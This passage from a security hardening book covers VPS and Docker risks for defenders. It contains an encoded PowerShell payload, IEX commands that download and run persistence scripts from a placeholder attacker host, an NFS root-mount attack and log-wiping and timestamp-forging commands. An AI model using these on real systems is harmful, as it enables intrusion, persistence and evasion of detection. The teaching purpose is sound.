AB2ADcANwBDAGQAZgByAGgAYgBmAGYAVABXADUAMwB6AHoAWQBmADcAZgBjAG4AWAAzADMAdQBuADcAKwBuAFoALwBhAG\

UAVABoADUAZAByAEIANABYAHUALwBmAFcAMAA3AHEAKwBZAFAAWgA1AGUAVAB5AHcAZgBUAHoAVAB3ADQAKwArAFcAVAA\

1AEoAUAA4ADgAUAAxAGoAZgBtADkAMAByAGYAMwBMAHYAcAA2ADgAbgA4ADQAZQA3AG4ALwA0ACsANQAvAGMAZQBMAEgA\

OQB3ADkAKwByADQAcwA0AC8AdgBqAEwANwBYAEkAWgAzADMAKwB4AGYAVgBMAEMAYwBTAFAAYwAyAG4AKwB0AGsAZABhA\

HYANABtAGYAOQBlAE8AVAA1AGYAVABhAGsAYgBVAG8AbQArAFAAWAA1ACsAYwBuAGQAMgA1AE0AOABaAGMAdgBLAGwATw\

BsADcATwB0AE8ANwAvAGsATgAwADYASwA4AHkAMAA3ADkANwArAFkALwB5AFMAZQB5AEsAZgByAHUAbQBpAHYAeAB5ACs\

ASgAwAE4ATgBpAGwAWgBWAGoANQBSAHYANwB3AGYAYwAzAE4ARABxAGIARQBaAC8AUQBOADkAVABuADUAMwBsADcAcwBx\

ADYASgBnAGQAbwB0ADYAdgBtAHMATwBWAHUAKwBxAHMAcAA4AFUAdwA5AFAAMQBrAFgAWgBTAHIAUAB2AGYAMwB3ADgAV\

wB4AFIATAB3AHEAegBPADIAcQByACsAKwBBADQAeAA1AHkALwArADMAVgA3AFcAMQBmAGwAbgB2ADkAdgBMAFYAMQA4AC\

sATwAzAHQAKwBPAGoANAB1AHkANgA4AGEAUQBwADkAKwBmAHIAdABxADIAdQBiAHcAZAAzAHUAWgBYAFoAZABWAE4AdgB\

2AHMAbwAyAFkANgBiADcAUABtAGIAWgBQAGUAUABTAEYAZQBhAHYAUAAwADcAcQB1AHYAMAB1AGEANgBhAGYATgBGAGUA\

dgBmADEAUwBmAHIAdABMADcAOQA2ADkAZgB6ADMAUwBlACsAKwBlAGEASABDAFUAZABQAHYAcgA5AEkALwA0AEsAUABmA\

GIAZQB0ADMATwAxADEAZQBQAG4AcgBOAFQAVgA5AFYAVgBYAHYAbgA5ADUAWABmADcAKwAzADkAdgBvAFkATwAxAFYAVg\

BlAHYANQA3AG4AWgBmAG4ANwBYAHUANgBPAGQAMwA3AGYARgBmADUAdQA4AFAAYwA0AGYANQBlAG4AMgB5ACsAcQA1AGQ\

AbQBTAEkARwBZAGsAUgBaAGYANQBIAC8ARABSAFIAMABUAHAAdgBHAHoAeQAvAGcAQwBVAFAAQgBqAEUAcgBjAGIAdwBj\

ADQARAA0ADQAdQAyAHMAcQBOAE8AdAAxADYAdQB5AGEATABkAGYAWgB1ADAAOABwAFgAKwBCAGQATQBwAGoAbwBWAG4AW\

gB1AHAAagBxADcAKwBrAG4ANgBkAGIASAA2AGMAZgBwAHQAOQBKAFAAZAAzAGIAbwBEADkAVQBRAGQAMwA3AG0AeQAzAF\

cANwAvAFkAdwAwAGkATABSAEwAdAA1ADkAVgB4AEcAegA1AHUAOQBTAE0AbABSAHUAOABXAEoAZgBsAGIANQB4ADgAbAB\

6AGcAagAzADYAYQAvAFYAKwB2AFcAZgB1ADgAUgBVAEUAQwBPAHoANQBhAFgAMQBkAHUAYwBtAGYAaQBYAGQATgBRAGIA\

SQBTAGcAcwAvAFIAcwBuAHYAMwBIAHkALwB3AEEAPQAnACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuA\

EMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAWwBUAGUAeA\

B0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkA"

IEX ((new-object net.webclient).downloadstring('http://<listener-attack-ip>/Persistence.ps1 '\

))

# and:

IEX ((new-object net.webclient).downloadstring('http://<listener-attack-ip>/EncodedPersistent\

Script.ps1 '))

The PowerSploit Persistence module offers the following persistence techniques:

- PermanentWMI

- ScheduledTask (as we have just seen)

- Registry

At the following stages:

- AtLogon

- AtStartup

- OnIdle

- Daily

- Hourly (as we have just seen)

- At (specify specific times)

There are many ways to achieve persistence. I have not included any lateral movement or privilege escalation amongst these PowerShell plays, but feel free to take your post exploitation further. Even the tools we have used in these plays have a good variety of both.

Unnecessary and Vulnerable Services

Overly Permissive File Permissions, Ownership and Lack of Segmentation

Failing to segment a file system according to the least amount of privilege that authorised parties require is often the precursor to privilege escalation.

Privileged services that are started on system boot by your init system (as discussed under the Proactive Monitoring section) often run other executable files whether they be binaries or scripts.

When an executable (usually run as a daemon) is called by one of these privileged services and is itself writeable by a low privileged user, then a malicious actor can swap the legitimate executable for a trojanised replica, or even just a malicious executable if they think it will go unnoticed.



If we take the path of least resistance when setting up our partitions on installation by combining file system resources that have lesser requirements for higher privileges, together with those that have greater requirements, then we are not applying the principle of least privilege. What this means is that some resources that do not need the extra privileges in order to do their job, get given them anyway. Attackers can take advantage of this by swapping in (writing) and executing malicious files, directly or indirectly.

If the target file that an attacker wants to swap for a trojanised version is world writeable, user writeable or even group writeable, and they are that user or in the specified group, then they will be able to swap the file… Unless the mounted file system is restrictive enough to mitigate the action.
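As a rough illustration of the kind of check the tools below automate, the following sketch lists files that are writable by group or by everyone. The function name `writable_by_group_or_other` and the file names in the throwaway directory are assumptions made for this example, not part of any tool mentioned in this chapter.

```shell
# List regular files under directory $1 that are writable by group or by
# everyone, the files a low privileged user may be able to swap out.
writable_by_group_or_other() {
    find "$1" -type f \( -perm -0020 -o -perm -0002 \) 2>/dev/null
}

# Demonstration on a throwaway directory (hypothetical file names).
demo_dir=$(mktemp -d)
touch "$demo_dir/locked-down" "$demo_dir/world-writable"
chmod 755 "$demo_dir/locked-down"
chmod 757 "$demo_dir/world-writable"
writable_by_group_or_other "$demo_dir"   # prints only the world-writable path
rm -rf "$demo_dir"
```

On a real host you would point the function at the directories your init system executes files from. Which directories those are depends on your distribution, so treat any path you pass in as something to confirm first.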

- The first risk is at the file permission and ownership level

- The first tool we can pull out of the bag is unix-privesc-check, which has its source code on GitHub and is also shipped with Kali Linux, but only the 1.x version (unix-privesc-check single file), which is fine, but the later version which sits on the master branch (upc.sh main file plus many sub files) does a lot more, so it can be good to use both. You just need to get the shell file(s) from either the 1_x or master branch onto your target machine and run. Running as root allows the testing to be a lot more thorough for obvious reasons. If I’m testing my own host, I will start with upc.sh. I like to test as a non-root user first, as that is the most realistic in terms of how an attacker would use it. Simply looking at the main file will give you a good idea of the options, or you can just run:

./upc.sh -h

To run:

# Produces a reasonably nice output

./upc.sh > upc.output

- LinEnum is also very good at host reconnaissance, providing a lot of potentially good information on files that can be trojanised.

- Also check the Additional Resources chapter for other similar tools for both Linux and Windows.

- The second risk is at the mount point of the file system. This is quite easy to test and it also takes precedence over file permissions, as the mount options apply to the entire mounted file system. This is why applying as restrictive as possible permissions to granular file system partitioning is so effective.

- The first and easiest command to run is:

mount

This will show you the options that all of your file systems were mounted with. In the Countermeasures we address how to improve the permissiveness of these mounted file systems.

- For peace of mind, I usually like to test that the options that our file systems appear to be mounted with actually are. You can make sure by trying to write an executable file to the file systems that have noexec as specified in /etc/fstab and attempt to run it, it should fail.

- You can try writing any file to the file systems that have the ro (read-only) option specified against them in the /etc/fstab, that should also fail.

- Applying the nosuid option to your mounts prevents the suid (Set owner User ID) bit on executables from being respected. If for example we have an executable that has its suid bit set, any other logged in user temporarily inherits the file owner's permissions as well as the UID and GID to run that file, rather than their own permissions.
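Checking mount options by eye gets tedious across many hosts, so here is a minimal sketch of automating it. It assumes the Linux /proc/mounts format (device, mount point, type, comma separated options) rather than the output of mount. The function name `has_mount_option` and the sample data are made up for this illustration.

```shell
# has_mount_option MOUNT_POINT OPTION
# Reads lines in /proc/mounts format on stdin and succeeds if MOUNT_POINT
# is mounted with OPTION.
has_mount_option() {
    awk -v mp="$1" -v opt="$2" '
        $2 == mp {
            n = split($4, opts, ",")
            for (i = 1; i <= n; i++) if (opts[i] == opt) found = 1
        }
        END { exit (found ? 0 : 1) }
    '
}

# Hypothetical sample data, standing in for the real /proc/mounts.
sample_mounts='/dev/sda1 / ext4 rw,relatime 0 0
/dev/sda2 /tmp ext4 rw,nosuid,nodev,noexec,relatime 0 0'

if printf '%s\n' "$sample_mounts" | has_mount_option /tmp noexec; then
    echo "/tmp is mounted noexec"
fi
if ! printf '%s\n' "$sample_mounts" | has_mount_option / noexec; then
    echo "/ is NOT mounted noexec"
fi
```

Against a live Linux system you would feed it the real file, for example `has_mount_option /tmp noexec < /proc/mounts`. This only tells you what the kernel reports, so the manual write and execute tests described above are still worth doing.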

Running a directory listing that has a file with its suid bit set will produce a permission string similar to -rwsr--r--

The s is in the place of the owner's executable bit. If instead a capital S is shown, it means that the suid bit is set but the owner's execute bit is not, so the file is not executable by its owner.

All suid files can be found with the following command:

find / -perm -4000 -type f 2>/dev/null

All suid files owned by root can be found with the following command:

find / -uid 0 -perm -4000 -type f 2>/dev/null

To add the suid bit, you can do so the symbolic way or numeric.

symbolic:

chmod u+s <yourfile>

numeric:

chmod 4750 <yourfile>

This adds the suid bit, read, write and execute for owner, read and execute for group and no permissions for other. This is just to give you an idea of the relevance of the 4 in the above -4000, do not go setting the suid bits on files unless you fully understand what you are doing, and have good reason to. This could introduce a security flaw, and if the file is owned by root, you may have just added a perfect vulnerability for an attacker to elevate their privileges to root due to a defect in your executable or the fact that the file can be modified/replaced.
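To see how the numeric modes map onto the permission strings discussed above, here is a small sketch you can run safely as a non-root user on throwaway files. The helper name `perm_string` and the file names are assumptions for this example only.

```shell
# Print the 10-character permission string that ls shows for a file.
perm_string() {
    ls -ld -- "$1" | cut -c1-10
}

demo_dir=$(mktemp -d)
touch "$demo_dir/suid_exec" "$demo_dir/suid_noexec"

# suid + rwx for owner, r-x for group, nothing for other.
chmod 4750 "$demo_dir/suid_exec"
# suid + rw- for owner (no execute bit), r-x for group, nothing for other.
chmod 4650 "$demo_dir/suid_noexec"

perm_string "$demo_dir/suid_exec"     # -rwsr-x---
perm_string "$demo_dir/suid_noexec"   # -rwSr-x---

rm -rf "$demo_dir"
```

The files are empty and owned by you, so nothing here grants any extra privilege. It only shows where the lower case s and the capital S come from.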

So for example if root owns a file and the file has its suid bit set, anyone who is permitted to execute that file runs it as root.

We will now walk through the steps of how an attacker may carry out a privilege escalation.

You can find the video of how it is played out at https://youtu.be/ORey5Zmnmxo.

The Countermeasures sections that address this are:

- Partitioning on OS Installation

- Lock Down the Mounting of Partitions, which also briefly touches on improving file permissions and ownership

Weak Password Strategies

This same concept was covered in the People chapter of Fascicle 0, which also applies to VPS. In addition to that, the risks are addressed within the countermeasures section.

Root Logins

Allowing root logins is a lost opportunity for another layer of defence in depth, where the user must elevate privileges before performing any task that could possibly negatively impact the system. Once an attacker is root on a system, the system is owned by them. Root is a user and no guess work is required for that username. Other low privileged users require some guess work on the part of the username as well as the password, and even once both parts of a low privileged credential have been acquired, there is another step to total system ownership.

SSH

You may remember we did some fingerprinting of the SSH daemon in the Reconnaissance section of the Processes and Practises chapter in Fascicle 0. SSH in itself has been proven to be solid. In saying that, SSH is only as strong as the weakest link involved. For example, if you are using the default of password authentication and have not configured which remote hosts can or can not access the server, and chose to use a weak password, then your SSH security is only as strong as the password. There are many configurations that a default install of SSH uses in order to get up and running quickly, that need to be modified in order to harden SSH. Using SSH in this manner can be convenient initially, but it is always recommended to move from the defaults to a more secure model of usage. I cover many techniques for configuring and hardening SSH in the SSH Countermeasures section.

Too Many Boot Options

Being able to boot from alternative media to that of your standard OS, provides additional opportunity for an attacker to install a root-kit on your machine, whether it be virtual or real media.

Portmap

An attacker can probe the Open Network Computing Remote Procedure Call (ONC RPC) port mapper service on the target host, where the target host is an IP address or a host name.

If installed, the rpcinfo command with -p will list all RPC programs (such as quotad, nfs, nlockmgr, mountd, status, etc) registered with the port mapper (whether the deprecated portmap or the newer rpcbind). Many RPC programs are vulnerable to a collection of attacks.

100000 4 tcp 111 portmapper

100000 3 tcp 111 portmapper

100000 2 tcp 111 portmapper

100000 4 udp 111 portmapper

100000 3 udp 111 portmapper

100000 2 udp 111 portmapper

100000 4 7 111 portmapper

100000 3 7 111 portmapper

100000 2 7 111 portmapper

100005 1 udp 649 mountd

100003 2 udp 2049 nfs

100005 3 udp 649 mountd

100003 3 udp 2049 nfs

100024 1 udp 600 status

100005 1 tcp 649 mountd

100024 1 tcp 868 status

100005 3 tcp 649 mountd

100003 2 tcp 2049 nfs

100003 3 tcp 2049 nfs

100021 0 udp 679 nlockmgr

100021 0 tcp 875 nlockmgr

100021 1 udp 679 nlockmgr

100021 1 tcp 875 nlockmgr

100021 3 udp 679 nlockmgr

100021 3 tcp 875 nlockmgr

100021 4 udp 679 nlockmgr

100021 4 tcp 875 nlockmgr

This provides a list of RPC services running that have registered with the port mapper, thus providing an attacker with a lot of useful information to take into the Vulnerability Searching stage discussed in the Processes and Practises chapter of Fascicle 0.

The deprecated portmap service as well as the newer rpcbind, listen on port 111 for requesting clients, some Unix and Solaris versions will also listen on ports above 32770.

Besides providing the details of RPC services, portmap and rpcbind are inherently vulnerable to DoS attacks, specifically reflection and amplification attacks. Clients make a request and the port mapper will respond with all the RPC servers that have registered with it, thus the response is many times larger than the request. This serves as an excellent vector for DoS, saturating the network with amplified responses.

These types of attacks have become very popular amongst distributed attackers due to their significant impact, lack of sophistication and ease of execution. Level 3 Threat Research Labs published a blog post on this port mapper DoS attack and how it has become very popular since the beginning of August 2015.

US-CERT also published an alert on UDP-Based Amplification Attacks outlining the Protocols, Bandwidth Amplification Factor, etc.

100000 2 tcp 0.0.0.0.0.111 portmapper unknown

100024 1 udp 0.0.0.0.130.255 status unknown

100024 1 tcp 0.0.0.0.138.110 status unknown

100003 2 udp 0.0.0.0.8.1 nfs unknown

100003 3 udp 0.0.0.0.8.1 nfs unknown

100003 4 udp 0.0.0.0.8.1 nfs unknown

100021 1 udp 0.0.0.0.167.198 nlockmgr unknown

100021 3 udp 0.0.0.0.167.198 nlockmgr unknown

100021 4 udp 0.0.0.0.167.198 nlockmgr unknown

100003 2 tcp 0.0.0.0.8.1 nfs unknown

100003 3 tcp 0.0.0.0.8.1 nfs unknown

100003 4 tcp 0.0.0.0.8.1 nfs unknown

100021 1 tcp 0.0.0.0.151.235 nlockmgr unknown

100021 3 tcp 0.0.0.0.151.235 nlockmgr unknown

100021 4 tcp 0.0.0.0.151.235 nlockmgr unknown

100005 1 udp 0.0.0.0.235.25 mountd unknown

100005 1 tcp 0.0.0.0.182.4 mountd unknown

100005 2 udp 0.0.0.0.235.25 mountd unknown

100005 2 tcp 0.0.0.0.182.4 mountd unknown

100005 3 udp 0.0.0.0.235.25 mountd unknown

100005 3 tcp 0.0.0.0.182.4 mountd unknown

100000 2 udp 0.0.0.0.0.111 portmapper unknown

You will notice in the response as recorded by Wireshark, that the length is many times larger than the request, 726 bytes in this case, hence the reflected amplification:

<source IP> <dest IP> Portmap 82 V3 DUMP Call (Reply In 76)

<dest IP> <source IP> Portmap 726 V3 DUMP Reply (Call In 75)

The packet capture in Wireshark, which is not shown here, also confirms that it is UDP.
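To put a number on the amplification, the two lengths Wireshark reported above (82 bytes for the call, 726 bytes for the reply) can be divided. This is a back of the envelope sketch that treats those captured lengths as the request and response sizes. The function name `amplification_factor` is an assumption for this example.

```shell
# amplification_factor REQUEST_BYTES RESPONSE_BYTES
# Prints how many times larger the response is than the request.
amplification_factor() {
    awk -v req="$1" -v resp="$2" 'BEGIN { printf "%.2f\n", resp / req }'
}

amplification_factor 82 726   # 8.85
```

So for every byte the attacker sends in this capture, the victim receives nearly nine. The more RPC programs a host has registered, the larger the reply and therefore the factor.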

EXIM

Exim, along with offerings such as Postfix, Sendmail, Qmail, etc, are Mail Transfer Agents (MTAs), which on a web server are probably not required.

There have been plenty of exploits created for Exim security defects. Most of the defects I have seen have patches available, so if Exim is a necessity, stay up to date with your patching. If you are still on a stable release (jessie at the time of writing) and can not update to a testing release, make sure to use backports.

At the time of writing this, the very front page of the Exim website states “All versions of Exim previous to version 4.87 are now obsolete and everyone is very strongly recommended to upgrade to a current release.”.

Jessie (stable) uses Exim 4.84.2, whereas jessie-backports uses Exim 4.87. Exim 4.86.2 was patched for the likes of CVE-2016-1531. Now if we have a look at the first exploit for this vulnerability (https://www.exploit-db.com/exploits/39535/) and dissect it a little:

The Perl shell environment variable $PERL5OPT can be assigned options, these options will be interpreted as if they were on the #! line at the beginning of the script. These options will be treated as part of the command run, after any optional switches included on the command line are accepted.

-M, which is one of the allowed switches (-[DIMUdmw]) to be used with $PERL5OPT allows us to attempt to use a module from the command line, so with -Mroot we are trying to use the root module, then PERL5OPT=-Mroot effectively puts -Mroot on the first line like the following, which runs the script as root:

#!perl -Mroot

The Perl shell environment variable $PERL5LIB is used to specify a colon (or semicolon on Windows) separated list of directories in which to look for Perl library files before looking in the standard library and the current directory.

Assigning /tmp to $PERL5LIB immediately before the exploit is run, means the first place execution will look for the root module is in the /tmp directory.

NIS

Some History:

NIS+ was introduced as part of Solaris 2 in 1992 with the intention that it would eventually replace Network Information Service (NIS), originally known as Yellow Pages (YP). NIS+ featured stronger security, authentication, greater scalability and flexibility, but it was more difficult to set up, administer and migrate to, so many users stuck with NIS. NIS+ was removed from Solaris 11 at the end of 2012. Other more secure distributed directory systems such as Lightweight Directory Access Protocol (LDAP) have come to replace NIS(+).

What NIS is:

NIS is a Remote Procedure Call (RPC) client/server system and a protocol providing a directory service, letting many machines in a network share a common set of configuration files with the same account information, such as the commonly locally stored UNIX:

- users

- their groups

- hostnames

- e-mail aliases

- etc

- and contents of the /etc/passwd and referenced /etc/shadow which contains the hashed passwords, discussed in detail under the Review Password Strategies section

The NIS master server maintains canonical database files called maps. We also have slave servers which have copies of these maps. Slave servers are notified by the master via the yppush program when any changes to the maps occur. The slaves then retrieve the changes from the master in order to synchronise their own maps. The NIS clients always communicate directly with the master, or a slave if the master is down or slow. Both master and slave(s) service all client requests through ypserv.

Vulnerabilities and exploits:

NIS has had its day, it is vulnerable to many exploits, such as DoS attacks using the finger service against multiple clients, buffer overflows in libnasl,

“lax authentication while querying of NIS maps (easy for a compromised client to take advantage of), as well as the various daemons each having their own individual issues. Not to mention that misconfiguration of NIS or netgroups can also provide easy holes that can be exploited. NIS databases can also be easily accessed by someone who doesn’t belong on your network. How? They simply can guess the name of your NIS domain, bind their client to that domain, and run a ypcat command to get the information they are after.”

NIS can run on unprivileged ports, which means that any user on the system(s) can run the NIS daemons. If a replacement version of these daemons was put in place of the original, then the attacker would have access to the resources that the daemons control.

Rpcbind

rpcbind listens on the same port(s) as the deprecated portmap and suffers the same types of DoS attacks.

Telnet

Telnet provides a command line interface on a remote server via its application layer client-server protocol, traditionally on port 23. Telnet was created and launched in 1969. It provides no encryption, and credentials are sent in plain text. There have been extensions to the Telnet protocol which provide Transport Layer Security (TLS) and Simple Authentication and Security Layer (SASL), but many Telnet implementations do not support these.

Telnet is still provided turned on, on many cheap hardware appliances, which continue to provide an excellent source of ownable resources for those looking to acquire computing devices illegally to launch attacks from. Many of these devices also never have their default credentials changed.

FTP

The FTP protocol was not designed with security in mind and does not use any form of encryption. The credentials you use to authenticate, and all of your traffic including any sensitive information you have in the files that you send or receive, to or from the FTP server, will be on the wire in plain text. Even if you think your files do not contain any sensitive information, often there will be details hiding, for example, if you are [m]putting / [m]getting source files, there could be database credentials or other useful bits of information in config files.

Many people have been using FTP for years, in many cases never even considering the fact that FTP adds no privacy to anything it touches.





Most FTP clients also store the user's credentials in plain text, completely neglecting to consider defence in depth. It should be considered that your client machine is already compromised. If credentials are stored encrypted, then it is one more challenge that an attacker must conquer. All software created with security in mind realises this, and if they must store credentials, they will be hashed via a best of breed KDF (as discussed in the Data-store Compromise section of the Web Applications chapter) with the recommended number of iterations (as discussed in the Review Password Strategies section a little later in this chapter). In regards to FTP, the clients are designed to store multiple credentials, one set for each site, the idea being that you don’t have to remember them, so they need to be encrypted, rather than hashed (one way, not reversible), so they can be decrypted.

A couple of the most popular clients are:

FileZilla (cross platform) FTP client stores your credentials in plain text. Yes, the UI conceals your password from shoulder surfers, but that is the extent of its security, basically none.

WinSCP (Windows) is a FTP, SFTP and SCP client for Windows. WinSCP has a number of ways in which you can have it deal with passwords. By default, when a user enters their password on the authentication window, it is stored in memory and reused for all subsequent authentications during the same session. This is of course open to exploitation as is, also in-memory data can be swapped to disk, written to crash dump files and accessed by malware.

Another option is to store passwords along with other site specific configurations to the registry for installed WinSCP, or to an INI file (overridable) for the portable version. These passwords are stored obfuscated, as the documentation puts it “stored in a manner that they can easily be recovered”. If you are interested, you can check the EncryptPassword function on the WinSCP github mirror, in which a short and simple set of bitwise operations are performed on each character of the password and the user and host are concatenated as what looks to be some sort of pseudo-salt. Although this option exists, it is recommended against.

And here is why: the decrypt_password exploit, consumed by the winscp metasploit module. Additional details are on the cosine-security blog.

The recommended way to store the site specific passwords is to use a Master Password. This appears to use a custom implementation of the AES256 block cipher, with a hard-coded 1000 rounds of SHA1.

WinSCP provides a lot of options, which may or may not be a good thing.

NFS

mountd or rpc.mountd is the NFS mount daemon, which listens for and services NFS client requests to mount a file system.

If mounts are listed in the /etc/fstab, attempts will be made to mount them on system boot.

If the mountd daemon is listed in the output of the above rpcinfo command, the showmount -e command will be useful for listing the NFS server's list of exports defined in the server's /etc/exports file.

for <target host>:

/ (anonymous) # If you're lucky as an attacker, anonymous means anyone can mount.

/ * # means all can mount the exported root directory.

# Probably because the hosts.allow has ALL:ALL and hosts.deny is blank.

# Which means all hosts from all domains are permitted access.
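If you are auditing your own NFS server, a listing like the one above can be filtered for the worrying entries. The sketch below assumes one export per line in the form "path clients", with `*` or `(anonymous)` marking an export open to everyone, as in the listing above. Other showmount implementations may label open exports differently. The function name `open_exports` and the sample addresses are made up for this example.

```shell
# Reads an export listing on stdin and prints the paths of exports that
# any host may mount ("*" or "(anonymous)" in the clients column).
open_exports() {
    awk '$1 ~ /^\// && ($2 == "*" || $2 == "(anonymous)") { print $1 }'
}

# Hypothetical listing, standing in for real showmount -e output.
printf '%s\n' \
    'Export list for 192.0.2.10:' \
    '/ *' \
    '/srv/data 192.0.2.0/24' \
    '/pub (anonymous)' | open_exports
```

With the sample data this prints / and /pub, the two exports that are not restricted to a network range.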

NFS is one of those protocols that you need to have some understanding of in order to achieve a level of security sufficient for your target environment. NFS provides no user authentication, only host based authentication. NFS relies on the AUTH_UNIX method of authentication, in which the user ID (UID) and group IDs (GIDs) that the NFS client passes to the server are implicitly trusted.

# Make sure local rpcbind service is running:

service rpcbind status

# Should yield [ ok ] rpcbind is running.

# If not:

service rpcbind start

mount -t nfs <target host>:/ /mnt

All going well for the attacker, they will now have your VPS’s / directory mounted to their /mnt directory. If you have not set up NFS properly, they will have full access to your entire file system.

To establish some persistence, an attacker may be able to add their SSH public key:

The NFS daemon always listens on the unprivileged port 2049. An attacker without root privileges on a system can start a trojanised nfsd which will be bound to port 2049.

- On a system that does not usually offer NFS, the attacker could then proceed to create a spear phishing attack, in which they lure the target to open a pdf or similar from the exported filesystem, or even using a fake (pickled) filesystem. As the export(s) would probably be on an internal network, target trust levels would be very high, or…

- If they can find a way to stop an existing nfsd and run their own, clients may communicate with the trojanised nfsd and possibly consume similar exports. By replacing a NFS daemon with a trojanised replica, the attacker would also have access to the resources that the legitimate daemon controls.

The ports that a Linux server will bind its daemons to are listed in /etc/services.

As well as various privilege escalation vulnerabilities, NFS has also suffered from various buffer overflow vulnerabilities.

Lack of Visibility

As I was writing this section, I realised that visibility is actually an asset, so I went back and added it… actually to several chapters. Without visibility, an attacker can do a lot more damage than they could if you were watching them and able to react, or even if you have good auditing capabilities. It is in fact an asset that attackers often try and remove for this very reason.

Any attacker worth their weight will try to cover their tracks as they progress. Once an attacker has shell access to a system, they may:

- Check running processes to make sure that they have not left anything they used to enter still running

- Remove messages in logs related to their break (walk) in

- Same with the shell history file. Or even:

ln /dev/null ~/.bash_history -sf

so that all following history vanishes.

- They may change time stamps on new files with:

touch -r <referenceFile> <fileThatGetsReferenceFileTimeStampsApplied>

Or better is to use the original date-time:

touch -r <originalFile> <trojanFile>

mv <trojanFile> <originalFile>

- Make sure any trojan files they drop are the same size as the originals

- Replace md5sum so that it contains sums for the files that were replaced including itself. Although if an administrator ran rpm -V or debsums -c (Debian, Ubuntu) it would not be affected by a modified md5sum.
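From the defender's side, the history trick in the list above is cheap to look for. The following is a minimal sketch, not a substitute for a HIDS. It only checks whether a history file has been replaced with a symbolic link to /dev/null. The function name `history_is_nulled` is an assumption for this example.

```shell
# Succeeds if $1 is a symbolic link pointing at /dev/null.
history_is_nulled() {
    [ -L "$1" ] && [ "$(readlink "$1")" = "/dev/null" ]
}

if history_is_nulled "$HOME/.bash_history"; then
    echo "WARNING: $HOME/.bash_history is linked to /dev/null"
fi
```

An attacker who controls the host can of course replace the tools this relies on as well, which is why checks like this are best run from, or reported to, a system the attacker does not control.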

If an attacker wants their actions to be invisible, they may try replacing the likes of ps, pstree, top, ls, and possibly netstat or ss if they are trying to hide network activity from the host, and/or many other tools that reveal information about the system.

Taking things further, an attacker may load a kernel module that modifies the readdir() call and the proc filesystem so that any changes on the file system are untrustworthy, or if going to the length of loading custom modules, everything can be done from kernel space which is invisible until reboot.

Without visibility, an attacker can access your system(s) and alter, copy, or modify information without you knowing they did it. They can even launch DoS attacks without you noticing anything before it is too late.





Docker

With the continual push for shorter development cycles, combined with continuous delivery, cloud and virtual based infrastructure, containers have become an important part of the continuous delivery pipeline. Docker has established itself as a top contender in this space.

Many of Docker's defaults favour ease of use over security. In saying that, Docker’s security considerations follow closely. After working with Docker, the research I have performed in writing these sections on Docker security, and in having the chance to discuss many of my concerns and preconceived ideas with the Docker Security team lead Diogo Mónica over this period, it is my belief that by default Docker containers, infrastructure and orchestration provide better security than running your applications in Virtual Machines (VMs). Just be careful when comparing containers with VMs, as this is analogous with comparing apples with oranges.

The beauty in terms of security that Docker provides is immense configurability to improve the security many times more than the defaults. In order to do this, you will have to invest some time and effort into learning about the possible issues, features and how to configure them. It is this visibility that I have attempted to create in these sections on Docker security.

Docker security is similar to VPS security, except there is a much larger attack surface, due to running many containers with many different packages, many of which do not receive timely security updates, as noted by banyan and the morning paper.

A monolithic kernel such as the Linux kernel, containing tens of millions of lines of code which are reachable from untrusted applications via all sorts of networking, USB and driver APIs, has a huge attack surface. Adding Docker into the mix has the potential to expose all these vulnerabilities to each and every running container, and its applications within, thus making the attack surface of the kernel grow exponentially.

Docker leverages many features that have been in the Linux kernel for years, which provide a lot of security enhancements out of the box. The Docker Security Team are working hard to add additional tooling and techniques to further harden their components, which has become obvious as I have investigated many of them. You still need to know what all the features, tooling and techniques are, and how to use them, in order to determine whether your container security is adequate for your needs.

From the Docker overview, it says: “Docker provides the ability to package and run an application in a loosely isolated environment”. Later in the same document it says: “Each container is an isolated and secure application platform, but can be given access to resources running in a different host or container” leaving the “loosely” out. Then it goes on to say: “Encapsulate your applications (and supporting components) into Docker containers”. The meaning of encapsulate is to enclose, but if we are only loosely isolating, then we’re not really enclosing, are we? I will address this concern in the following Docker sections and subsections.

To start with, I am going to discuss many areas where we can improve container security, then at the end of this Docker section I will discuss why application security is far more of a concern than container security.

Consumption from Registries

Similar to Consuming Free and Open Source from the Web Applications chapter, many of us trust the images on Docker Hub without much consideration of the possible defective packages within. There have been quite a few reports with varying numbers of vulnerable images, as noted by Banyan and “the morning paper” mentioned above.

The Docker Registry project is an open-source server side application that lets you store and distribute Docker images. You could run your own registry as part of your organisation's Continuous Integration (CI) / Continuous Delivery (CD) pipeline. Some of the publicly known instances of the registry are:

- Docker Hub

- EC2 Container Registry

- Google Container Registry

- CoreOS quay.io

Doppelganger images

Beware of doppelganger images that will be available for all to consume, similar to doppelganger packages that we discuss in the Web Applications chapter. A Docker image can contain a huge number of packages and a lot of code, which gives an attacker plenty of places to hide malware.
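One simple guard is to compare the image name you are about to pull against a list of names you already trust, and to flag near misses. The following Python is a minimal sketch of that idea, not a complete defence: the function name, the trusted list, and the similarity cutoff are all assumptions of mine, and it only catches look-alike names, not a malicious image published under a plausible new name.

```python
import difflib
from typing import List


def lookalikes(image: str, trusted: List[str], cutoff: float = 0.8) -> List[str]:
    """Return the trusted names that `image` resembles without matching exactly.

    An empty list means the name is either trusted as-is or not similar to
    anything on the list. The cutoff of 0.8 is an arbitrary starting point.
    """
    if image in trusted:
        return []
    # get_close_matches ranks candidates by difflib's similarity ratio.
    return difflib.get_close_matches(image, trusted, n=3, cutoff=cutoff)


if __name__ == "__main__":
    # Hypothetical trusted list for illustration only.
    trusted_images = ["ubuntu", "nginx", "redis"]
    for candidate in ("ubuntu", "ubunto"):
        print(candidate, "->", lookalikes(candidate, trusted_images))
```

A non-empty result is a prompt to stop and check the publisher before pulling, rather than proof of anything.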

The Default User is Root

What is worse, Docker's default is to run containers, and all commands / processes within a container, as root. This can be seen by running the following command from the CIS_Docker_1.13.0_Benchmark:

    docker ps --quiet | xargs docker inspect --format '{{ .Id }}: User={{ .Config.User }}'

If you have two containers running and the user has not been specified you will see something like the below, which means your two containers are running as root.

    <container n Id>: User=
    <container n+1 Id>: User=

Images derived from other images inherit the user defined in the parent image, explicitly or implicitly, so unless the image creator has specifically defined a non-root user, the user will default to root. That means all processes within the container will run as root.
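If you would rather script this check than read the output by eye, the following Python is a rough sketch of one way to do it. It parses the JSON array that `docker inspect` prints and returns the Ids of containers with no non-root user configured. Only the `Id` and `Config.User` fields come from the command above; the function name, the sample data, and the decision to treat an explicit `root`, `0` or `0:0` as root are my assumptions.

```python
import json
from typing import List

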